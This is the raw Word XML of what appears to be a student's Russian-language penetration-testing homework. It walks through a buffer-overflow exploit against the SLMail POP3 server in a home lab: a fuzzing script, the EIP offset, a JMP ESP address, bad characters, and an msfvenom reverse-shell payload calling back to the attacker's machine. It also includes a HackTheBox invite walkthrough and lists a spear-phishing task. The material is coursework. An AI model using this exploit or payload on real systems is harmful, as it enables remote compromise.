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#tinkoff fintech</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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homework #6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6jynaot9cbnq" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE Matrix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sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d64e8"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eqpoxxy8gmzz" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.04.2019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ogp52fyi6djo" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tasks#: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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ul9wzw3t7af" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ЗАДАНИЕ 1 (ОБЯЗАТЕЛЬНОЕ)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Повторить написание exploit для SLMAIL. На выходе либо репорт с комментариями и скриншотами либо видео как делали.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mieqmtduyt64" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2 (не участвует в оценке)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HackTheBox. Добыть себе инвайт, и поломать одну тачку. На выходе либо репорт с комментариями и скриншотами либо видео как делали.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yc25o3xw5zl" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 3 (не участвует в оценке)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Vulnserver (custom). Выдается лично при запросе у преподавателя. Нужно написать эксплоит. На выходе либо репорт с комментариями и скриншотами либо видео как делали.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wlepf8k0p2w" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 4 (не участвует в оценке)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="e01b84"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spear Phishing (C2) - только для тех, кто проявит явное желание. Провести Spear Phishing атаку на клиента. Дополнительные данные выдаются лично при запросе у преподавателя.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r91xj3o4kcdt" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task #1: SLMAIL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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4oh7dhtgkirk" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Введение.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Атака - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="263238"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer Overlfow </w:t>
      </w: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 - основана на уязвимости типичной для программ, написанных на языке Си. Основной смысл атаки - переполнить стэк чем-либо, чтобы вызвать segmentation faullt / crash. Конкретно в нашем случае, SLMAIL атакуется с помощью атаки на поле ввода пароля (PASS). Будем фазить (fuzzing - посылание рандомных символов в рандомные места с целью БО) на питоне примерно вот так: socket.send('PASS ' + string + '\r\n')  - отправляем в поле PASS нашу сгенерированную раннее строку.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b w:val="1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3238"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Что будем использовать?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Windows 7 with SLMAIL (no firewall setup) - винда с почтовым сервером.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Kali Linux - msfconsole, python scripts, and other stuff.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6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rwr3mu13nkya" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Мой Virtualbox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Установка слмэйл супер изи - некст - некст -некст, поэтому скриншоты не стал делать.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Установили слмэйл, далее запускаем с правами администратора софт (и мэйл, и иммунити дебаггер). Выглядит примерно так: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3914775" cy="100965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Далее жмем f1 - выбираем процесс SLMail и цепляемся к нему (f9 - run).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753100" cy="2562225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Осталось теперь сделать фаззинг скрипт на питоне и затестировать его.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Пример кода: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#!/usr/bin/python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import socket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# Create an array of buffers, from 1 to 5900, with increments of 200.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buffer=["A"]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counter=100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while len(buffer) &lt;= 30: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buffer.append("A"*counter)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counter=counter+200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for string in buffer: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print "Fuzzing PASS with %s bytes" % len(string)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s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)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connect=s.connect(('192.168.56.101',110))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s.recv(1024)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s.send('USER test\r\n')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s.recv(1024)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s.send('PASS ' + string + '\r\n')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s.send('QUIT\r\n')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16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        s.close()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В поле сокета.коннект указываем айпи адрес винды и порт 110 (поп3 порт на котором slmail)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943600" cy="2349500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Фаззинг пошел. На 2900 программа крашится.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Нас интересуют регистры ESP (stack pointer) &amp; EIP (instruction pointer). Посмотрим что в дебагере по этим регистрам.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943600" cy="1473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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">41 - это по таблицу ASCII -  ‘A’. Видим что произошло перезаписывание памяти стека нашим кодом.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Проблема в том, что пока мы точно не знаем сколько именно байтов надо для крэша программы. Для определение точного значения байт нам пригодится инcтрумент из коллекции метасплойта - pattern_create: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943600" cy="828675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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374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Style w:val="Heading6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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dyo1232ipuje" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Создаем уникальный стринг с длиной 2700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Модифицируем наш код  с учетом pattern_create таким образом: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519738" cy="229104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29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Запускаем код (предварительно перезапускаем slmail).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Все это мы делали для того, чтобы определить точный офсет символом, которые перезаписывают EIP (instruction pointer).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5014913" cy="1892928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892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pStyle w:val="Heading5"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nkvvzghy0nh4" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Опеределяем offset с помощью метасплоита. -q 39694438 -  адрес EIP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1562100" cy="32385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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4019550" cy="165735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Зная оффсет, перезапишем 4 байта EIP символами XXXX (для проверки, Х в ASCII = 58).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2" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="26323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63238"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Т.е. По факту первый 2606 байтов заполним А. Потом 4 байта EIP - Х. И последний 90 байтов - в качестве паддинга будут символы Z. Код ниже :)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4762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1295400" cy="161925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Ура, работает.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Немного пояснений, что мы вообще делаем и что происходит: мы отправляем в форму для пароля максимальную длину пароля в  2606 символов, после этого вступает в ход EIP. Так как мы знаем точный адрес EIP мы можем заставить компьютер прыгнуть в ESP регистр,, а оттуда он начнет выполнять инструкции которые мы запишем после 2606 + 4 байта :)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Сначала поищем незащищенные модули с помощью mona modules. </w:t>
      </w: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Нам подходит slmfc.dll или сам slmail.exe. Выбираем - *.dll. Почему?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ас интересуют только те модули, которые скомпиллены с отключенным ASLR и DEP (false). В ином случае, обратный адрес бы постоянно менялся и мы не смогли бы провести атаку таким образом. Для нашей атаки лучше использовать динамические библиотеки по многим причинам, например: использовать длл более надежно, адреса статичны, и нету проблем с нулевым байтом \0. Так как exe почти всегда загружаются с адреса с 0х000, 0х001… Поэтому, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">slmfc.dll </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:)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Переключаемся на этот длл. Смотрим код. Далее, ищем команду JMP ESP (ctrl + F)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_39d0bbpvxmhc" w:id="12"/>
      <w:bookmarkEnd w:id="12"/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К сожалению Not found. Ищем обходные пути.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Opcode выполняющий роль JMP ESP с адресом FF E4. С помощью mona find будем искать адреса.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148748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8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5"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k8ys8l2qy65e" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mona find -s “\xff\xe4″ -m slmfc.dll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Адрес записан с помощью little endian - поэтому запишем его в нашем коде в обратном порядке.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752725" cy="28575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Т.е. 5f 4a 35 8f =&gt; 8f 35  4a 5f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Теперь подготовим наш шелл.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58912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8151" l="0" r="0" t="9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Выглядит не очень съедобно для python’a потому что нам надо сначала сделать encode. Но для начала, надо определиться с “bad characters”. \x00 - нуль-терминатор (в си строки заканчиваются \0. После нуля терминатора чтение дальше происходить не будет. Следующие “плохие” символы - это \x0A и \x0D - по аски таблице это символы новой строки и возврата каретки. Почему они плохие? Потому что в поле ввода пароля их не может быть. А вообще, чтобы быть до конца уверенным можно провести пару пробных краш-тестов с полным набором characters. И поэтапно убирать плохие (смотреть в дампе памяти на каком символе возникла проблема).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В итоге правильно скомпиленный шелл-код будет выглядеть вот так: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54162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226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5"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rtmwlwbgy8be" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali:~# msfvenom -p windows/shell/reverse_tcp LHOST=192.168.56.102 LPORT=443 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00\x0A\x0D" -e x86/shikata_ga_nai &gt; shellcode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-b - bad characters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-f c - форматирует в Си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-e - encode (+обфускация кода)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&gt; shellcode - записываем шеллкод в файл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Дальше собираем наш питон файл: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Итоговая для получения реверс шелла  строка, отправляемая в поле PASS будет выглядеть следующим образом:.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buffer = "A"* 2606 + eip + 16 * "\x90" +  shell, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">где: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А*2606</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - паддинг из А. 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eip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - адрес который мы нашли выше ( 8f 35  4a 5f)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16*”\x90”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - NOP. aka No Operations command. Мы выделяем место в памяти под encoder shikata_ga_nai. По факту ноп можно поставить и больше 16, лишь бы хватило места для самого шелла потом. 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- shellcode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852139" cy="6415088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139" cy="641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На кали слушаем 443 порт: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lv10otnqu0bc" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task #2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_czkjcs785qib" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB INVITE;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Заходим на страницу с инвайтом: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Смотрим сорсы, в частности js inviteapi.min.js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Читаются ван-лайны тяжело, поэтому кидаем в beautify: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3845698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3845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Юзаем функцию мэйкинвайт в консоле дев-тулз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Кодировка рот-13.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Decoded - &gt; In order to generate the invite code, make a POST request to /api/invite/generate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Отправляем пост запрос с помощью curl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На выходе бэйс64 - декодим в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3890963" cy="333807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338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3824288" cy="1354435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35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headerReference r:id="rId39" w:type="first"/>
      <w:headerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42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86688" cy="1060518"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="footer graphic" id="26" name="image32.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image3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ind w:left="-15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86688" cy="1060518"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="footer graphic" id="19" name="image32.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image3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9" name="image4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic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corner graphic" id="21" name="image28.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic" id="0" name="image2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color w:val="9900ff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35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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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24.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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